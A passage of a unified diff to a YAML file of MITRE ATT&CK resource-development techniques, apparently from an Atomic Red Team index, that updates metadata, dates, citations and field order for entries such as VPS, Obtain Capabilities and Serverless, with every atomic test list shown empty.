       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -52569,7 +53243,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -52591,7 +53264,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -52610,42 +53283,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -52654,22 +53295,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -52683,7 +53355,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -52770,11 +53442,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -52834,7 +53505,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -52876,7 +53546,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -52891,7 +53561,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -52982,11 +53651,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -53019,15 +53687,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -53111,7 +53780,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -53165,7 +53833,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -53216,36 +53883,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -53254,21 +53895,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -53314,17 +53981,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -53350,7 +54016,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -53382,8 +54048,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -53410,7 +54074,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53434,8 +54098,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -53461,7 +54123,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -53495,8 +54157,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -53544,7 +54204,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -53560,7 +54220,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -53619,54 +54278,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -53677,22 +54292,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -53755,37 +54414,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
